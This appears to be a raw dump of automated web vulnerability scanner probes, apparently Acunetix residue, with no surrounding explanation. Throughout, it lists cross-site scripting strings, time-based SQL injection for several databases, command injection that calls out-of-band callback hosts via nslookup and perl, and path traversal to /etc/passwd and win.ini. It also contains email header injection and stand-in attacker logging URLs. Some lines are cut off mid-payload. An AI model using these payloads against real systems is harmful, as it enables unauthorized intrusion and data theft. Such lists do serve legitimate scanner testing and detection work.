http://attacker-9506/log.php?
}body{acu:Expre/**/SSion(5xpN(9212))}
\u003CScRiPt\5xpN(9867)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%35%78%70%4E%289980%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9715/log.php?
}body{acu:Expre/**/SSion(oTX6(9884))}
\u003CScRiPt\oTX6(9010)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%6F%54%58%36%289812%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
acu10041<s1﹥s2ʺs3ʹuca10041
http://attacker-9435/log.php?
}body{acu:Expre/**/SSion(MN1J(9465))}
\u003CScRiPt\MN1J(9381)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%4D%4E%31%4A%289729%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9707/log.php?
}body{acu:Expre/**/SSion(Ly0j(9412))}
http://attacker-9191/log.php?
\u003CScRiPt\Ly0j(9529)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%4C%79%30%6A%289018%29%3C%2F%73%43%72%69%70%54%3E
}body{acu:Expre/**/SSion(cESI(9846))}
\u003CScRiPt\cESI(9393)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%63%45%53%49%289940%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
''||(select 1 from (select pg_sleep(15))x)||''
'||(select 1 from (select pg_sleep(15))x)||'
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
JB13bjh8')) OR 46=(SELECT 46 FROM PG_SLEEP(15))--
CbF1LzTq') OR 397=(SELECT 397 FROM PG_SLEEP(15))--
Dfa7GTfP' OR 65=(SELECT 65 FROM PG_SLEEP(15))--
-1)) OR 70=(SELECT 70 FROM PG_SLEEP(15))--
-5) OR 908=(SELECT 908 FROM PG_SLEEP(15))--
-5 OR 188=(SELECT 188 FROM PG_SLEEP(15))--
1 waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(sele...
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1 OR 3+346-346-1=0+0+0+1
-1 OR 2+346-346-1=0+0+0+1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'+'A'.concat(70-3).concat(22*4).concat(102).concat(81).concat(104).concat(90)+(require'socket'
So...
"+"A".concat(70-3).concat(22*4).concat(106).concat(84).concat(119).concat(66)+(require"socket"
So...
HttP://bxss.me/t/xss.html?%00
ctime
sleep
p0
(I30
tp1
Rp2
.
".gethostbyname(lc("hitka"."pruhyyqkaadc1.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(75)...
'.gethostbyname(lc('hitwy'.'pwmhpfki0750e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(89)...
http://bxss.me/t/fit.txt?.jpg
1some_inexistent_file_with_long_name
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
`(nslookup hituvkppkskphba406.bxss.me||perl -e "gethostbyname('hituvkppkskphba406.bxss.me')")`
|(nslookup hitxpfmyzznqj6881d.bxss.me||perl -e "gethostbyname('hitxpfmyzznqj6881d.bxss.me')")
&(nslookup hitvapzvffzis43b2c.bxss.me||perl -e "gethostbyname('hitvapzvffzis43b2c.bxss.me')")&'\"...
$(nslookup hitvzctfgyyaw893cd.bxss.me||perl -e "gethostbyname('hitvzctfgyyaw893cd.bxss.me')")
(nslookup hitsqsicllctb26b3a.bxss.me||perl -e "gethostbyname('hitsqsicllctb26b3a.bxss.me')")
|echo iczdli$()\ vvapxh\nz^xyu||a #' |echo iczdli$()\ vvapxh\nz^xyu||a #|" |echo iczdli$()\ vvapx...
&echo lswuwe$()\ orsbog\nz^xyu||a #' &echo lswuwe$()\ orsbog\nz^xyu||a #|" &echo lswuwe$()\ orsbo...
echo oxxtaj$()\ gscwer\nz^xyu||a #' &echo oxxtaj$()\ gscwer\nz^xyu||a #|" &echo oxxtaj$()\ gscwer...
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../etc/passwd
"+response.write(9539242*9252584)+"
'+response.write(9539242*9252584)+'
to@example.com>
bcc:074625.19373-152583.19373.cfb66.19130.2@bxss.me
bcc:074625.19373-152582.19373.cfb66.19130.2@bxss.me
response.write(9539242*9252584)